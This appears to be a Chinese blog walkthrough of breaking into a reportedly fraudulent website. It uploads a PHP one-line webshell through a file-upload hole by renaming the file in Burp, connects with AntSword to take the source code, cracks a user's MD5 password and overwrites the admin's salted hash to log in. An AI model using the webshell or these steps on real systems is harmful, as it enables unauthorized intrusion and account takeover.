文件上传漏洞利用

打开burp

打开burp自带浏览器，首先打开网站，登录进去后，找到文件上传漏洞入口

在入口传输一句话木马文件，开启burp拦截包


一句话木马内容

<?php eval($_POST['pass']); ?>

拦截到的数据包

对thumb的信息进行url解码

风险为上传的图片马数据，即证明图片马已经上传到诈骗网站

修改传输数据中的png为php，使用在线工具进行URL加密

粘贴到burp拦截数据包处，放行数据包

在浏览器中点击F12，查找文件上传路径

打开蚁剑

入口在burp里找

连接成功，拿到源码

前台登录——密码绕过

尝试登录前台，发现未持有邀请码无法注册

在小皮中安装数据库图形化管理工具并打开


数据库账号与密码

成功进入后台

这里有两个方法，第一种直接在库中查到用户

这里选择尾号5001进行操作，对后面的密码进行md5解密

查到密码为111111，成功登录

第二种方法，进入管理员界面
找到管理员数据库

同样尝试md5解密，但是不是弱口令，无法破解

先进入网站，发现如果输错密码输出“密码错误”


于是查看网站代码。输入错误密码，使用notepad++在网站根目录下定位对应保存信息“密码错误”。找到网站根目录。


正在搜索

搜索结果

搜索通过逻辑

这段代码是PHP语言中的一个条件语句，用于验证用户输入的密码是否正确。下面是对这段代码逻辑的解释：

$user['password']：这是从数据库或用户会话中获取的存储的用户密码。
md5()：这是一个PHP函数，用于计算字符串的MD5哈希值。
$password：这是用户输入的密码。
$user['salt']：这是与用户密码一起存储的随机字符串，用于增加密码的安全性。
md5($password.$user['salt'])：这一部分代码将用户输入的密码与盐值连接起来，然后计算它们的MD5哈希值。
if ($user['password'] != md5($password.$user['salt']))：这个条件语句检查存储的MD5哈希密码是否与用户输入的密码和盐值的MD5哈希值不匹配。
如果条件为真（即不等于），则表示用户输入的密码不正确，因为它们没有产生与存储的哈希密码相同的结果。如果条件为假（即等于），则表示密码匹配，用户输入的密码是正确的。
这种密码验证方法是一种常见的安全实践，通过使用盐值来防止彩虹表攻击，这是一种使用预先计算的哈希值来破解密码的方法。然而，MD5算法已经不再被认为是安全的密码哈希函数，因为它容易受到多种攻击，如碰撞攻击。现在更推荐使用更安全的哈希算法，如bcrypt、argon2等。
于是，找到原来的管理员数据表

构造123456代码，将123456afkkAL进行md5加密，放入数据库中


注意这里要改成小写才行，亲测！
重新登录

本文由 root 创作，采用 知识共享署名4.0 国际许可协议进行许可。
本站文章除注明转载/出处外，均为本站原创或翻译，转载前请务必署名。